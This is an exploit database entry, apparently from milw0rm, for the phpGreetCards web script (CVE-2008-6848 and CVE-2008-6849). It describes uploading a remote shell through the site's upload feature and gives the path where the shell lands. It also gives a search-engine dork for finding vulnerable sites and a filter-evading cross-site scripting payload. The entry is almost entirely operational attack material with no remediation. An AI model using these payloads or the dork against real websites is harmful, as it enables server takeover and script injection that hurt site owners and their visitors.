phpGreetCards - Cross-Site Scripting / Arbitrary File Upload
Author: ahmadbady
type: webapps
platform: php
port:
date_added: 2008-12-22
date_updated: 2017-01-23
verified: 1
codes: OSVDB-50989;CVE-2008-6849;OSVDB-50988;CVE-2008-6848
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comphpGreetCards.zip
...................................................................................................
****(remote shell upload/xss)****
script: phpGreetCards
***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip
***************************************************************************
www.site.com/path/index.php?mode=select&category
shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"
if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.
------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************
Author: ahmadbady
**************************************************
# milw0rm.com [2008-12-23]